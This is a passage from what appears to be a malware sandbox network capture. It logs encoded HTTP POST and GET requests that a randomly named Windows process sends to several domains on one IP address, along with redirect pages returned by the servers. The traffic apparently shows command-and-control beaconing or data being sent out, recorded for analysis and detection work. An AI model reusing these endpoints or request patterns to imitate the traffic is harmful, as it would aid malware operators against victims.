46	192.168.11.20	49864	15.197.148.33	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:03:31.244719982 CEST	830	OUT	POST /te6q/ HTTP/1.1 Host: www.allinathletes.biz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.allinathletes.biz Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 220 Referer: http://www.allinathletes.biz/te6q/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 4d 67 51 63 48 52 53 39 53 6b 72 6c 4e 35 31 2f 57 34 6c 35 45 5a 31 6e 50 75 75 56 67 71 49 71 37 42 73 61 5a 70 63 37 69 2b 2b 43 4b 37 45 55 79 42 2b 65 68 6c 2b 61 55 6c 58 35 67 4b 66 30 50 78 72 79 47 55 45 67 6c 44 38 30 4b 50 51 35 79 70 4d 37 4f 46 6d 2b 44 39 44 57 54 4c 70 52 46 74 7a 2f 71 76 48 61 78 6d 49 49 4d 34 74 61 61 74 46 6e 57 55 4f 4a 51 74 63 67 34 6b 37 74 62 37 5a 4b 6d 57 37 64 51 6b 49 34 55 36 70 56 4b 48 4f 32 69 34 37 38 53 57 6b 38 43 45 41 6c 31 79 5a 51 69 50 66 39 71 7a 4b 6f 37 50 6f 71 49 54 36 38 4a 62 4e 65 4d 62 43 30 62 56 6b 54 55 41 41 58 2f 48 48 75 6d 4f 51 55 6a 44 52 36 47 37 66 67 77 2f 4d 3d Data Ascii: ATk=MgQcHRS9SkrlN51/W4l5EZ1nPuuVgqIq7BsaZpc7i++CK7EUyB+ehl+aUlX5gKf0PxryGUEglD80KPQ5ypM7OFm+D9DWTLpRFtz/qvHaxmIIM4taatFnWUOJQtcg4k7tb7ZKmW7dQkI4U6pVKHO2i478SWk8CEAl1yZQiPf9qzKo7PoqIT68JbNeMbC0bVkTUAAX/HHumOQUjDR6G7fgw/M=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.11.20	49865	15.197.148.33	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:03:33.884876966 CEST	1289	OUT	POST /te6q/ HTTP/1.1 Host: www.allinathletes.biz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.allinathletes.biz Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Referer: http://www.allinathletes.biz/te6q/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 4d 67 51 63 48 52 53 39 53 6b 72 6c 4e 35 31 2f 57 34 6c 35 45 5a 31 6e 50 75 75 56 67 71 49 71 37 42 73 61 5a 70 63 37 69 2b 32 43 4e 4e 34 55 67 79 57 65 67 6c 2b 61 59 46 58 36 67 4b 66 54 50 77 50 32 47 55 4a 62 6c 46 77 30 49 70 63 35 30 59 4d 37 45 46 6d 2b 63 74 44 58 64 72 6f 4c 46 74 6a 7a 71 76 58 61 78 6d 49 49 4d 2b 4a 61 4f 49 6c 6e 61 30 4f 47 61 4e 63 57 38 6b 37 46 62 34 70 77 6d 57 2f 33 51 55 6f 34 55 61 5a 56 50 31 6d 32 2f 49 37 36 65 32 6b 6b 43 45 39 39 31 79 56 63 69 50 36 53 71 31 75 6f 34 62 5a 52 51 51 57 66 54 64 31 31 47 59 2b 35 56 57 77 46 56 79 42 75 76 6b 58 65 70 4a 67 4d 69 78 4e 30 63 59 47 72 76 5a 79 73 2f 67 73 68 46 48 48 6b 42 4c 58 66 70 74 50 51 75 58 67 56 31 57 69 63 37 47 7a 62 4a 59 64 56 66 63 77 41 72 4b 34 63 77 41 52 47 48 47 48 61 73 4f 61 78 32 42 38 68 53 39 6e 58 42 49 4e 76 76 69 45 59 6e 74 58 4a 68 4b 65 35 64 32 32 78 4d 66 77 2b 54 78 34 75 55 47 62 4a 41 57 65 4c 44 74 69 44 4c 43 37 55 39 70 6c 77 4e 30 73 30 71 4f 42 43 41 64 [TRUNCATED] Data Ascii: ATk=MgQcHRS9SkrlN51/W4l5EZ1nPuuVgqIq7BsaZpc7i+2CNN4UgyWegl+aYFX6gKfTPwP2GUJblFw0Ipc50YM7EFm+ctDXdroLFtjzqvXaxmIIM+JaOIlna0OGaNcW8k7Fb4pwmW/3QUo4UaZVP1m2/I76e2kkCE991yVciP6Sq1uo4bZRQQWfTd11GY+5VWwFVyBuvkXepJgMixN0cYGrvZys/gshFHHkBLXfptPQuXgV1Wic7GzbJYdVfcwArK4cwARGHGHasOax2B8hS9nXBINvviEYntXJhKe5d22xMfw+Tx4uUGbJAWeLDtiDLC7U9plwN0s0qOBCAdpBorZ5LsRnU44ZYRoBXVHEUL+e4YOG8PIIHbsKHjj9KPcCPMKownukh5NEoeTqanwyobP3evMdUOnW0+h5Q6mh+IwDN114pMkgcUHXwQc5Zkqs0ykFseZ+FxKXh5VHLaqWdk1F10LVdosN6Y1HrBo9gKblCgtpY1qZdGtBNZcDwTFXKhH1zqoBO/LmSvsSGyAeD78UH0SyPHGc/Rb0x0BirLcdj4Y1JgweYxjWDQPnznp5l6y66nv9U8E5Kf7DUwxbaLzVj47/dDLY6967rvBF3esRKDCjEAAQUgjPsfSSHaGQw+QKLFakaFmQa0M0tv7bT3pMJAkccgXLr0f2zu
Oct 11, 2024 10:03:33.884924889 CEST	1289	OUT	Data Raw: 39 4b 44 59 79 51 37 48 79 6c 41 62 72 73 6b 68 36 6b 64 79 44 34 34 49 51 39 45 49 53 79 30 4f 69 45 53 2b 67 7a 33 51 52 46 58 73 35 71 73 34 66 42 75 65 68 44 30 62 56 35 50 6c 48 68 61 47 4e 61 62 76 33 73 6a 63 73 45 56 70 6f 37 36 78 7a 34 Data Ascii: 9KDYyQ7HylAbrskh6kdyD44IQ9EISy0OiES+gz3QRFXs5qs4fBuehD0bV5PlHhaGNabv3sjcsEVpo76xz4yi/9SzkYUw2PZI6+uEmuZzjkQbNwB30gf2Q18Iwzd27Ayjf8CGz+zLFL4FARLl3/E5NcHcSzCY2Vx/JoxDeAsOXJ181IRFH4ePKF7KnfnCWA9gQUCs0VQ9GUz5UBvKPGayM3JTC1wjZ+rOcwfAPBvIBIxobALltss
Oct 11, 2024 10:03:33.884974957 CEST	5401	OUT	Data Raw: 47 4e 4f 7a 57 6d 41 4a 4e 59 79 33 39 77 61 6f 6f 72 68 46 51 67 59 78 55 51 39 53 49 49 64 67 65 2f 53 43 43 68 43 75 65 2f 54 45 35 4e 4c 57 38 34 63 59 6a 68 66 74 36 30 44 62 7a 6f 51 2f 67 57 62 32 49 59 71 56 6b 75 44 41 33 78 61 39 65 2f Data Ascii: GNOzWmAJNYy39waoorhFQgYxUQ9SIIdge/SCChCue/TE5NLW84cYjhft60DbzoQ/gWb2IYqVkuDA3xa9e/giZ94OB4PDNJHjEM3P29kD/KKxN6NolX3yWj2xCf7acwAi6jQQih2JvpIJ/RzI8gqmI+rNZTCTXGzud9Jh0OZAp55/UV5vmlKSuvG4iA9FknYpyO9Gu/VLNkEgbCXe1MhO7JdOX25V/2cH4sJK4xiwifXcB8R4Qf6

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.11.20	49866	15.197.148.33	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:03:36.521560907 CEST	545	OUT	GET /te6q/?VDohI=5PBL_pQpTf5haV&ATk=Bi48EnnHLnucFoFteYAZbM12VO+YpqUowmdcea1K+IX7Dd8zgRCPoE2+V26bo8zYK23oBEB5tVQZMZR237sZLVeieLGkB+ILMPGhp+qwj0taeKVYBLshWkk= HTTP/1.1 Host: www.allinathletes.biz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Oct 11, 2024 10:03:37.530405045 CEST	400	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 11 Oct 2024 08:03:37 GMT Content-Type: text/html Content-Length: 260 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 56 44 6f 68 49 3d 35 50 42 4c 5f 70 51 70 54 66 35 68 61 56 26 41 54 6b 3d 42 69 34 38 45 6e 6e 48 4c 6e 75 63 46 6f 46 74 65 59 41 5a 62 4d 31 32 56 4f 2b 59 70 71 55 6f 77 6d 64 63 65 61 31 4b 2b 49 58 37 44 64 38 7a 67 52 43 50 6f 45 32 2b 56 32 36 62 6f 38 7a 59 4b 32 33 6f 42 45 42 35 74 56 51 5a 4d 5a 52 32 33 37 73 5a 4c 56 65 69 65 4c 47 6b 42 2b 49 4c 4d 50 47 68 70 2b 71 77 6a 30 74 61 65 4b 56 59 42 4c 73 68 57 6b 6b 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?VDohI=5PBL_pQpTf5haV&ATk=Bi48EnnHLnucFoFteYAZbM12VO+YpqUowmdcea1K+IX7Dd8zgRCPoE2+V26bo8zYK23oBEB5tVQZMZR237sZLVeieLGkB+ILMPGhp+qwj0taeKVYBLshWkk="}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.11.20	49867	15.197.148.33	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:03:42.751025915 CEST	816	OUT	POST /el3s/ HTTP/1.1 Host: www.barbequecritics.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.barbequecritics.com Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 200 Referer: http://www.barbequecritics.com/el3s/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 33 52 79 58 65 32 4e 53 62 58 2f 54 4a 6d 53 6a 2f 4b 65 55 37 4a 74 79 47 36 2b 49 52 39 63 61 54 69 76 78 4d 68 58 50 56 55 6c 70 61 4e 67 4b 6a 35 4a 65 51 47 63 70 42 5a 48 7a 45 50 6d 6d 65 72 53 50 78 59 47 6a 56 6b 34 4c 57 74 4d 49 69 46 58 62 79 64 62 51 6b 70 54 79 2b 56 61 44 6a 61 67 4a 41 68 76 58 7a 45 51 6a 6d 47 35 35 71 52 6c 31 6a 46 30 7a 62 7a 33 58 47 6f 67 4b 72 6b 33 6e 57 63 63 43 45 49 77 43 76 2b 42 62 42 45 5a 6a 77 71 6f 72 76 6e 2f 52 46 39 4b 54 63 32 79 71 6c 67 63 41 46 70 4c 4b 6f 75 67 58 53 50 57 47 47 55 74 34 46 59 5a 74 65 6f 71 75 49 41 3d 3d Data Ascii: ATk=3RyXe2NSbX/TJmSj/KeU7JtyG6+IR9caTivxMhXPVUlpaNgKj5JeQGcpBZHzEPmmerSPxYGjVk4LWtMIiFXbydbQkpTy+VaDjagJAhvXzEQjmG55qRl1jF0zbz3XGogKrk3nWccCEIwCv+BbBEZjwqorvn/RF9KTc2yqlgcAFpLKougXSPWGGUt4FYZteoquIA==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.11.20	49868	15.197.148.33	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:03:45.381470919 CEST	836	OUT	POST /el3s/ HTTP/1.1 Host: www.barbequecritics.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.barbequecritics.com Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 220 Referer: http://www.barbequecritics.com/el3s/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 33 52 79 58 65 32 4e 53 62 58 2f 54 49 46 61 6a 2b 70 47 55 35 70 74 31 44 36 2b 49 48 4e 63 65 54 69 6a 78 4d 67 54 6c 56 68 31 70 66 63 51 4b 69 38 39 65 58 47 63 70 4b 35 48 32 4b 76 6d 39 65 71 75 39 78 63 47 6a 56 6c 59 4c 57 74 38 49 69 30 58 63 7a 4e 62 57 38 5a 54 30 39 6c 61 44 6a 61 67 4a 41 68 37 39 7a 45 49 6a 6e 32 4a 35 72 77 6c 36 2f 56 30 73 53 54 33 58 4e 49 67 47 72 6b 33 2f 57 64 51 37 45 4c 45 43 76 36 4e 62 51 31 5a 67 2b 71 6f 74 77 33 2b 44 44 6f 33 4c 55 46 4f 4c 32 51 4d 2f 49 59 58 52 6b 59 78 4e 50 39 69 69 46 48 78 4b 42 6f 67 46 63 71 72 31 56 46 47 61 4d 4b 58 6f 31 4c 4f 59 4c 71 6c 64 4c 55 72 62 4d 39 59 3d Data Ascii: ATk=3RyXe2NSbX/TIFaj+pGU5pt1D6+IHNceTijxMgTlVh1pfcQKi89eXGcpK5H2Kvm9equ9xcGjVlYLWt8Ii0XczNbW8ZT09laDjagJAh79zEIjn2J5rwl6/V0sST3XNIgGrk3/WdQ7ELECv6NbQ1Zg+qotw3+DDo3LUFOL2QM/IYXRkYxNP9iiFHxKBogFcqr1VFGaMKXo1LOYLqldLUrbM9Y=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.11.20	49869	15.197.148.33	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:03:48.021378040 CEST	1289	OUT	POST /el3s/ HTTP/1.1 Host: www.barbequecritics.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.barbequecritics.com Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Referer: http://www.barbequecritics.com/el3s/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 33 52 79 58 65 32 4e 53 62 58 2f 54 49 46 61 6a 2b 70 47 55 35 70 74 31 44 36 2b 49 48 4e 63 65 54 69 6a 78 4d 67 54 6c 56 68 39 70 44 2b 59 4b 69 66 56 65 57 47 63 70 57 70 48 33 4b 76 6e 76 65 72 47 35 78 63 44 65 56 67 63 4c 57 50 30 49 6b 41 6a 63 38 4e 62 57 31 35 54 78 2b 56 61 57 6a 5a 59 57 41 68 72 39 7a 45 49 6a 6e 31 52 35 37 52 6c 36 39 56 30 7a 62 7a 32 59 47 6f 67 69 72 6b 2f 76 57 64 55 30 45 39 30 43 76 61 64 62 53 6e 68 67 79 71 6f 76 7a 33 2f 47 44 6f 7a 71 55 46 53 48 32 51 35 61 49 61 33 52 33 73 45 73 4c 39 53 74 57 32 49 46 63 70 51 53 4e 63 33 4a 4c 6d 43 64 4d 4b 44 48 31 38 6d 4b 55 4a 64 4c 66 56 43 65 53 62 62 51 38 47 73 2f 4d 38 2f 6f 53 56 54 74 6f 51 5a 4d 51 6c 69 45 41 68 47 63 51 42 5a 2b 62 70 34 65 69 4c 34 63 69 79 55 30 44 4c 36 30 31 2f 39 59 47 5a 47 51 76 49 41 53 5a 46 5a 32 6c 73 5a 79 4a 61 46 72 63 57 66 65 30 77 66 2b 71 62 52 49 65 70 47 78 62 61 51 7a 43 53 62 6e 62 45 54 50 41 66 6f 52 66 39 79 68 4d 6a 39 35 49 47 44 44 57 51 38 34 32 46 [TRUNCATED] Data Ascii: ATk=3RyXe2NSbX/TIFaj+pGU5pt1D6+IHNceTijxMgTlVh9pD+YKifVeWGcpWpH3KvnverG5xcDeVgcLWP0IkAjc8NbW15Tx+VaWjZYWAhr9zEIjn1R57Rl69V0zbz2YGogirk/vWdU0E90CvadbSnhgyqovz3/GDozqUFSH2Q5aIa3R3sEsL9StW2IFcpQSNc3JLmCdMKDH18mKUJdLfVCeSbbQ8Gs/M8/oSVTtoQZMQliEAhGcQBZ+bp4eiL4ciyU0DL601/9YGZGQvIASZFZ2lsZyJaFrcWfe0wf+qbRIepGxbaQzCSbnbETPAfoRf9yhMj95IGDDWQ842F9EEhQPCMFwsoHtQPb4G+AvAOOs5rSmT7XJNLut4kZ4RYiLQ4eXhZsIdFWoDSj8ZdE9HrN8t8VduLLzvWoZgMDFp+HATEZk4815s5hADBqKxOjtRWlY6H7JoAaEvNtTjC8+NHMhy1Y3vLjoCUJTpVJjDC7Da/H6echhCI7hgjxD0Ct3lTIhHRBNHlyL4lpSLgAc+sVjsns7TC6N+Nbv+ASdgji1BXTdxOgYo74kSx7GX/qtj93cBBCikUtkxPCfekVdhIjVzQklxYRVc0ECtN0kdm/1A+6j4zlv/IibfcAKpNo1AIIyK1YNuhtIfzGkh8xdPvvmA/E4UyFm
Oct 11, 2024 10:03:48.021430016 CEST	3867	OUT	Data Raw: 61 55 71 7a 55 51 37 54 49 30 78 2b 7a 50 71 4f 4e 30 32 4e 34 67 42 73 68 7a 65 55 32 41 73 64 72 36 49 33 64 2b 56 54 6f 52 58 63 68 47 46 30 65 32 53 46 56 2b 6b 76 4d 56 4a 79 79 48 46 33 36 41 63 55 79 4b 41 30 43 2b 48 31 4d 41 64 50 67 79 Data Ascii: aUqzUQ7TI0x+zPqON02N4gBshzeU2Asdr6I3d+VToRXchGF0e2SFV+kvMVJyyHF36AcUyKA0C+H1MAdPgyR2N6BD0P2MlWUddEpJ36Xw3Sn1uUXiVSo0ZTQjcSDbQNlGRfinvZWp1WfvHeRBDByn6Eq8UnoeHHmHTpngSUJ3/7VFrnGM0ciGVHEr9PGPS+WF3hPFq8G02ITkaYI1Ml9DDFqhINHPFqPIkTCMOouPIaCqaT9uBxj
Oct 11, 2024 10:03:48.021476984 CEST	2829	OUT	Data Raw: 48 2f 75 38 39 42 36 30 39 71 61 59 73 65 41 75 73 65 47 5a 30 5a 32 52 32 47 52 72 47 61 4d 64 69 55 4b 76 6f 69 6d 59 6d 65 6a 39 71 69 67 59 47 4a 61 51 76 5a 45 4f 4c 77 7a 7a 79 74 44 74 42 42 6e 76 53 4b 43 66 48 33 41 4f 37 74 72 35 50 6d Data Ascii: H/u89B609qaYseAuseGZ0Z2R2GRrGaMdiUKvoimYmej9qigYGJaQvZEOLwzzytDtBBnvSKCfH3AO7tr5Pmp3WrjGj/EwMzEcnP5DsOuu+NWqGKCwVgaipiwz4+oDjLsaMC3qCSZX+yMyuvDjMHuVGDZqhqTOV8JNrxXsdx8hwC55wIYUFDnTevqnentZTmfvWsyOVxKq115qoHWOjHYaq/JUkqTHGkw0Rf8cNt94PAQVTbriEWH

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.11.20	49870	15.197.148.33	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:03:50.658931017 CEST	547	OUT	GET /el3s/?ATk=6Ta3dC1SbFexLGaAyLCMrvtEQp7UC9YLWm/0OzXEbXNGBqYW7sBnSGUWAqT2FNWebLiZ+YaCaloaRZMkiWHL7MfZ4P+RlEyvopkHNBDi+G5Q1FNXiRoH7Ec=&VDohI=5PBL_pQpTf5haV HTTP/1.1 Host: www.barbequecritics.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Oct 11, 2024 10:03:51.673227072 CEST	400	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 11 Oct 2024 08:03:51 GMT Content-Type: text/html Content-Length: 260 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 41 54 6b 3d 36 54 61 33 64 43 31 53 62 46 65 78 4c 47 61 41 79 4c 43 4d 72 76 74 45 51 70 37 55 43 39 59 4c 57 6d 2f 30 4f 7a 58 45 62 58 4e 47 42 71 59 57 37 73 42 6e 53 47 55 57 41 71 54 32 46 4e 57 65 62 4c 69 5a 2b 59 61 43 61 6c 6f 61 52 5a 4d 6b 69 57 48 4c 37 4d 66 5a 34 50 2b 52 6c 45 79 76 6f 70 6b 48 4e 42 44 69 2b 47 35 51 31 46 4e 58 69 52 6f 48 37 45 63 3d 26 56 44 6f 68 49 3d 35 50 42 4c 5f 70 51 70 54 66 35 68 61 56 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ATk=6Ta3dC1SbFexLGaAyLCMrvtEQp7UC9YLWm/0OzXEbXNGBqYW7sBnSGUWAqT2FNWebLiZ+YaCaloaRZMkiWHL7MfZ4P+RlEyvopkHNBDi+G5Q1FNXiRoH7Ec=&VDohI=5PBL_pQpTf5haV"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.11.20	49871	15.197.148.33	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:03:56.903669119 CEST	822	OUT	POST /hv5a/ HTTP/1.1 Host: www.wineservicesgroup.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.wineservicesgroup.net Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 200 Referer: http://www.wineservicesgroup.net/hv5a/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 64 37 76 31 52 38 71 55 42 59 57 43 63 2f 35 73 41 51 58 54 45 46 6d 41 6b 72 66 47 4f 4f 34 45 4d 4a 48 47 58 66 68 61 57 75 53 61 47 78 35 4e 33 44 52 77 6a 6f 4a 6c 4f 41 56 32 4c 4e 69 4f 35 79 37 48 42 48 43 54 6d 73 51 48 59 34 6c 33 73 65 46 6e 47 58 62 52 74 2b 61 36 56 35 5a 33 74 4d 6f 41 74 68 4c 61 61 57 69 53 4f 68 70 66 6c 44 68 67 55 77 59 52 56 67 6b 72 75 6b 57 47 75 46 68 71 64 4b 74 6c 47 54 36 4a 7a 46 6a 69 48 74 6d 70 68 69 41 2b 56 4c 54 54 66 37 49 67 77 4a 37 6d 32 72 66 35 68 47 30 72 63 49 48 46 65 50 35 54 38 32 55 6d 76 4c 55 73 75 58 69 31 4a 41 3d 3d Data Ascii: ATk=d7v1R8qUBYWCc/5sAQXTEFmAkrfGOO4EMJHGXfhaWuSaGx5N3DRwjoJlOAV2LNiO5y7HBHCTmsQHY4l3seFnGXbRt+a6V5Z3tMoAthLaaWiSOhpflDhgUwYRVgkrukWGuFhqdKtlGT6JzFjiHtmphiA+VLTTf7IgwJ7m2rf5hG0rcIHFeP5T82UmvLUsuXi1JA==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.11.20	49872	15.197.148.33	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:03:59.534677029 CEST	842	OUT	POST /hv5a/ HTTP/1.1 Host: www.wineservicesgroup.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.wineservicesgroup.net Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 220 Referer: http://www.wineservicesgroup.net/hv5a/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 64 37 76 31 52 38 71 55 42 59 57 43 63 66 70 73 42 33 44 54 46 6c 6d 44 71 4c 66 47 46 75 34 49 4d 4a 4c 47 58 61 5a 73 57 64 6d 61 47 51 4a 4e 32 42 31 77 75 49 4a 6c 41 67 56 7a 42 74 69 46 35 79 33 35 42 43 36 54 6d 73 55 48 59 39 5a 33 73 74 39 6d 47 48 62 54 31 4f 61 34 62 5a 5a 33 74 4d 6f 41 74 68 66 38 61 57 71 53 4f 56 56 66 6b 6d 4e 2f 65 51 59 51 63 41 6b 72 6c 45 57 43 75 46 67 35 64 50 30 4b 47 52 79 4a 7a 45 2f 69 48 38 6d 71 32 79 42 37 52 4c 53 5a 4f 37 67 6c 33 62 58 51 78 62 37 55 74 56 35 55 64 65 57 66 44 39 4e 33 2f 6c 49 55 72 37 74 45 73 56 6a 75 55 48 2b 4d 4a 56 4e 35 50 55 44 39 35 38 46 55 4f 4f 4d 4a 79 6a 34 3d Data Ascii: ATk=d7v1R8qUBYWCcfpsB3DTFlmDqLfGFu4IMJLGXaZsWdmaGQJN2B1wuIJlAgVzBtiF5y35BC6TmsUHY9Z3st9mGHbT1Oa4bZZ3tMoAthf8aWqSOVVfkmN/eQYQcAkrlEWCuFg5dP0KGRyJzE/iH8mq2yB7RLSZO7gl3bXQxb7UtV5UdeWfD9N3/lIUr7tEsVjuUH+MJVN5PUD958FUOOMJyj4=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.11.20	49873	15.197.148.33	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:04:02.174880981 CEST	2578	OUT	POST /hv5a/ HTTP/1.1 Host: www.wineservicesgroup.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.wineservicesgroup.net Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Referer: http://www.wineservicesgroup.net/hv5a/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 64 37 76 31 52 38 